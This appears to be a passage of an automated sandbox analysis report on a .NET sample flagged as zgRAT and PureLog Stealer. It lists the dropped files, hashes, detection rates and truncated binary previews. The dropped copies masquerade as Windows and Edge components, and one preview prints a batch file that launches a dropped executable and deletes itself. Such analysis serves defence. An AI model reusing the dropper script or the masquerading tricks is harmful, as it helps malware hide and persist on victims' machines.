                                                        Preview:ylCvN2jhoatM063it5GWj83i5FwUNn6mD9ofn9zqsXNPoKKecfngLxezsd0IFPUBdHJ1RY5uGZ

                                                        C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1688064
                                                        Entropy (8bit):7.4440967682851955
                                                        Encrypted:false
                                                        SSDEEP:24576:2ztKoZmCJ4YrujnaOBDEzKt3pJqc7BnA8js2TvgAts0qB0FjbpcKSzQy8v1:O995MUzKNac7BnbbTvgCFTYQy+
                                                        MD5:844679E76D8254BEDD67C98610F7D7AC
                                                        SHA1:4222EBBB055830096B829F072783423DBE255932
                                                        SHA-256:9B08F03985D3378123BA236FAE1B41B42FCC9AF87932655A5120E04FA9A21942
                                                        SHA-512:FDDB80736936D7C0D46EC3958885237681CBBD416455D7A48D075092D38A0C5E435112C25B595B8CC99B0A8ED2143AC2F28E893373A7B6E9772EE722706A3C05
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................... ............@.................................`...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........p...........H...z............................................0..........(.... ........8........E....9...8...........84...(.... ....8....(.... ....~....{u...:....& ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E........S...*...b...........8.......... ....~....{....:....& ....8....~....9.... ....~....{t...9....& ....8....8A... ....8........~....(Q...~....(U... ....?.... ....8U...r...ps....z*~....(I... .... .... ....s....~....(M......

                                                        C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\ProgramData\Microsoft OneDrive\setup\3e8b633d968cb5

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):247
                                                        Entropy (8bit):5.732681474411286
                                                        Encrypted:false
                                                        SSDEEP:6:pigC+0i1/+U34nj90BB5qOr7EXiDeM0VrvlgRQMAagg:p5nVp+U34j90BB5m4TurvCQMZgg
                                                        MD5:FA40F28CE17A8F9A4B7154DDD07A7868
                                                        SHA1:7611D4A4BD1A8CD24137664CBB5ECF57EE47FAB0
                                                        SHA-256:4C803CFC819E4E13A8E876D7F6ABC11CE2FB6E04150D0B63471CF98EE029D37E
                                                        SHA-512:5C8AA244307738E816AB3B6FA1F139BA914EA2D22234F337973D0801B60E0FD09A61E2467ED3BC5313BFB769FC2B9ED42503E1894824F1DF86C48772C6E25154
                                                        Malicious:false
                                                        Preview:aPvNqU83VN762XD0j0WDBVKZStwVkWyhUG2EFNRTH1OItBRs709VB1NFEW56hnT9YZlvf9uViC5KHCpQbEXuXdgd3x9tRVweiPtUZfN8Gnw86C7CqofdPjl42I1rAAENQbm1SV161Znuqhh1z6DnzSO9nybQnf8FjjsfaGtUwim051NUlA1D7aX7MmNe4lSVaiKHzBbtNt1RqXDwlGonn4HIMuSx2PZKQRaWqGfjjIzOjGRzib2x7pr

                                                        C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1688064
                                                        Entropy (8bit):7.4440967682851955
                                                        Encrypted:false
                                                        SSDEEP:24576:2ztKoZmCJ4YrujnaOBDEzKt3pJqc7BnA8js2TvgAts0qB0FjbpcKSzQy8v1:O995MUzKNac7BnbbTvgCFTYQy+
                                                        MD5:844679E76D8254BEDD67C98610F7D7AC
                                                        SHA1:4222EBBB055830096B829F072783423DBE255932
                                                        SHA-256:9B08F03985D3378123BA236FAE1B41B42FCC9AF87932655A5120E04FA9A21942
                                                        SHA-512:FDDB80736936D7C0D46EC3958885237681CBBD416455D7A48D075092D38A0C5E435112C25B595B8CC99B0A8ED2143AC2F28E893373A7B6E9772EE722706A3C05
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................... ............@.................................`...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........p...........H...z............................................0..........(.... ........8........E....9...8...........84...(.... ....8....(.... ....~....{u...:....& ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E........S...*...b...........8.......... ....~....{....:....& ....8....~....9.... ....~....{t...9....& ....8....8A... ....8........~....(Q...~....(U... ....?.... ....8U...r...ps....z*~....(I... .... .... ....s....~....(M......

                                                        C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Recovery\3e8b633d968cb5

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with very long lines (827), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):827
                                                        Entropy (8bit):5.906247019424677
                                                        Encrypted:false
                                                        SSDEEP:24:2LB2cHJNYCHUZmSIq4DFzHHVhbUpJVAds/Wf1D:2V24JNYCH6NiV7bUVrG1D
                                                        MD5:C2E34BA116954F2F6DB28F4419E42B04
                                                        SHA1:9DD0B4979C43FA573CE5DA7026180529346642C3
                                                        SHA-256:B32896049D621C80821B6A95CF56FC2418A047FFE0DDE607FC27B81D563C59AD
                                                        SHA-512:F35E837A99A847669DF4052AA6F4ED9A9AAD9014A250D606E0152DAA398D783B557E37754141A9AF97C7BBEF301141A955294D024CFBEF607E1A0C0451CE8B3B
                                                        Malicious:false
                                                        Preview:w98SrEjAbADll0DjcpYwK6INZGyvPoVuYyY8w5xA7of5pkEZn2K3Kfoz0u2kQyuxoSMxbEwh1XzfbMiyCYHWdck2JiHBCNuI3sRWXQ7jGnBwqJYoMDh2qYTMsUn36ufonqms4LbvaiQzayMAJdz8p2ceYEoDmEmVIXI9gqtAmwbIIew3Intd5g9vOHU0hXIV65rDqMddtzW3aUW4Sv59VIamXWvZW3cOnGLNwsN5KPuFJFV4uZhwcJAxeFpTbDH0WHQUIJIji9yFYUcRB1p6VqwdFXsrD3eHI3tCzAvlR7OdV4ZKmXSjYKepVwOuabgoer7ekabAFDpYcTHL8hEpl4t7ZErDwBK0bj8o65kM5SeUfGNBoCw3W1Dj7AEgsYNE3y72UdPC71tTaYbT1pYtOQdjgZq60EegEZaqJUrLxu6fHuIjivpDAd0mVXW5wSL3XNOB8uJg7M6eU8cvQHXFYagkjyVw7wYeiDI4fHkxlIFxhVSW4lop4Ge6qobJYXjLyc5RziPIgkdQVsDNg81VHtjcjMN1qbYOi49FaAhVVgIUmOk8kNnZgODF2csnVYcFLPrbs8xfbfAlkPzUlORcx8sU04M7S3A7DDIXgJQmaI8AOcfnmXCGGASNgXlyv0MhfChgGcyb8pBoArGXZjU5130Du50Jib0k6afL58gKikIb8nMzRNZMfQqlLevLlp3gybrjM4caCJWQuYEGsB1UCoEqu39aMVi3rmnh6mmWv8JV3Z0wZockxidKXBzT4BOrldjIvhKGZejEeswUCNBh38FIIcJ4wTctucuazsA2eWLS8ZqpPfQrAqxmXa9

                                                        C:\Recovery\55b276f4edf653

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):169
                                                        Entropy (8bit):5.615612890405854
                                                        Encrypted:false
                                                        SSDEEP:3:1RGp0r3kJGKiV4uOIstyJ8/Tg3XVx3wMqQXBzNfXbkkBxnWJTESTzJTTu:PGp03KK5sN/exAMHhfrkkHOTEgpTu
                                                        MD5:8F6BB7FFD958B99AC780CE91ECB696DA
                                                        SHA1:AE7EDCB4BD7FCAAE4400C5D605E98E51855EABD1
                                                        SHA-256:273B868CADC98DFF3E1A8F8851B48C1F0A01000E247F6FFA1D4C154FFE795F72
                                                        SHA-512:D1EF3768484B72ED2A235034A7F1D16DE0B6482B33F882CCB8933A94146406A2E0496087F3748DEF94A70E4728061E154EC7DEB55E078B7A710E9A321CB84ED4
                                                        Malicious:false
                                                        Preview:IqkdDMvhBSMEk2ZwJTEDjFNxYmACq3WckvmZzKHi2WtmFwGHBoFLutkCdxFaLt0H6udzQA78LgLNVlrlg3BCxLs1Lk6BFrWJfmpVTR1BrH9OiWq1Fd4SryUuCmoqD53eJBrt5WSOBAVqLdTy3E6lwEcrS5TrnL7vNfFgo66sL

                                                        C:\Recovery\DViaOgnvmAhwCXZ.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1688064
                                                        Entropy (8bit):7.4440967682851955
                                                        Encrypted:false
                                                        SSDEEP:24576:2ztKoZmCJ4YrujnaOBDEzKt3pJqc7BnA8js2TvgAts0qB0FjbpcKSzQy8v1:O995MUzKNac7BnbbTvgCFTYQy+
                                                        MD5:844679E76D8254BEDD67C98610F7D7AC
                                                        SHA1:4222EBBB055830096B829F072783423DBE255932
                                                        SHA-256:9B08F03985D3378123BA236FAE1B41B42FCC9AF87932655A5120E04FA9A21942
                                                        SHA-512:FDDB80736936D7C0D46EC3958885237681CBBD416455D7A48D075092D38A0C5E435112C25B595B8CC99B0A8ED2143AC2F28E893373A7B6E9772EE722706A3C05
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................... ............@.................................`...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........p...........H...z............................................0..........(.... ........8........E....9...8...........84...(.... ....8....(.... ....~....{u...:....& ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E........S...*...b...........8.......... ....~....{....:....& ....8....~....9.... ....~....{t...9....& ....8....8A... ....8........~....(Q...~....(U... ....?.... ....8U...r...ps....z*~....(I... .... .... ....s....~....(M......

                                                        C:\Recovery\DViaOgnvmAhwCXZ.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Recovery\StartMenuExperienceHost.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1688064
                                                        Entropy (8bit):7.4440967682851955
                                                        Encrypted:false
                                                        SSDEEP:24576:2ztKoZmCJ4YrujnaOBDEzKt3pJqc7BnA8js2TvgAts0qB0FjbpcKSzQy8v1:O995MUzKNac7BnbbTvgCFTYQy+
                                                        MD5:844679E76D8254BEDD67C98610F7D7AC
                                                        SHA1:4222EBBB055830096B829F072783423DBE255932
                                                        SHA-256:9B08F03985D3378123BA236FAE1B41B42FCC9AF87932655A5120E04FA9A21942
                                                        SHA-512:FDDB80736936D7C0D46EC3958885237681CBBD416455D7A48D075092D38A0C5E435112C25B595B8CC99B0A8ED2143AC2F28E893373A7B6E9772EE722706A3C05
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\StartMenuExperienceHost.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\StartMenuExperienceHost.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\StartMenuExperienceHost.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\StartMenuExperienceHost.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................... ............@.................................`...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........p...........H...z............................................0..........(.... ........8........E....9...8...........84...(.... ....8....(.... ....~....{u...:....& ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E........S...*...b...........8.......... ....~....{....:....& ....8....~....9.... ....~....{t...9....& ....8....8A... ....8........~....(Q...~....(U... ....?.... ....8U...r...ps....z*~....(I... .... .... ....s....~....(M......

                                                        C:\Recovery\StartMenuExperienceHost.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0JLWNg4Sz1.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):1306
                                                        Entropy (8bit):5.353303787007226
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
                                                        MD5:BD55EA7BCC4484ED7DE5C6F56A64EF15
                                                        SHA1:76CBF3B5E5A83EC67C4381F697309877F0B20BBE
                                                        SHA-256:81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
                                                        SHA-512:B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
                                                        Malicious:true
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DViaOgnvmAhwCXZ.exe.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):847
                                                        Entropy (8bit):5.354334472896228
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                        MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                        SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                        SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                        SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\StartMenuExperienceHost.exe.log

                                                        Download File
                                                        Process:C:\Recovery\StartMenuExperienceHost.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):847
                                                        Entropy (8bit):5.354334472896228
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                        MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                        SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                        SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                        SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smartscreen.exe.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):847
                                                        Entropy (8bit):5.354334472896228
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                        MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                        SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                        SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                        SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                        C:\Users\user\AppData\Local\Temp\aC4Ftn18Tq

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.403856189774723
                                                        Encrypted:false
                                                        SSDEEP:3:1X8uhDqS+n:1sj1
                                                        MD5:052A3C60A004680A709F08A3A7618D8C
                                                        SHA1:50C8440246367E7748A93310B546E03BDE38C43F
                                                        SHA-256:48D47F0F7A217AF28AAC682B0F3CEC99E35E96A6F9ED3076CAEEA38C9352870D
                                                        SHA-512:24BAE1BE018906C532E4FCDA01727E1C796463DFBB49E3F33B7E436C9248E591B8AC1CA54A5AE2EF111C3129096AEEB72177B80C080789CDFAE2B74935A58A77
                                                        Malicious:false
                                                        Preview:AZ7rFelEDfE3iGddOaWmNlj45

                                                        C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):167
                                                        Entropy (8bit):5.16840857014452
                                                        Encrypted:false
                                                        SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7lnuQYtu9XNSBktKcKZG1t+kiE2J5xAIM/6o0RH:hCRLuVFOOr+DE7lnzWKOZG1wkn23frt
                                                        MD5:9BF27CA472B032697C90DE41660B6E43
                                                        SHA1:E158A47EC4D87D8867356BB9A25D7E338A8A7DDF
                                                        SHA-256:0F76F4B8F79BC1C41A9ABF231AA73653642181ACD09839373FBD4D0CA31CB1DF
                                                        SHA-512:5EDFCC65DB55AD894F3883E7A757BB64A626A8FE1F0C0143583C89BE9318F128D6A297E32DA916392DFD3E2E725C681A3CA7FDC15D7F3C9B693B868D9EC66788
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\StartMenuExperienceHost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\oLZ05R153F.bat"

                                                        C:\Users\user\Desktop\ALzNWdSZ.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Joe Sandbox View:
                                                        • Filename: auXl1Tzyme.exe, Detection: malicious, Browse
                                                        • Filename: cGZV10VyWC.exe, Detection: malicious, Browse
                                                        • Filename: oLlotc8NO3.exe, Detection: malicious, Browse
                                                        • Filename: PbfYaIvR5B.exe, Detection: malicious, Browse
                                                        • Filename: 9D7RwuJrth.exe, Detection: malicious, Browse
                                                        • Filename: qZoQEFZUnv.exe, Detection: malicious, Browse
                                                        • Filename: b2smJKgMG6.exe, Detection: malicious, Browse
                                                        • Filename: 01YP9Lwum8.exe, Detection: malicious, Browse
                                                        • Filename: wYP4G1XOF1.exe, Detection: malicious, Browse
                                                        • Filename: w49A5FG3yg.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\KjTCumlu.log

                                                        Download File
                                                        Process:C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
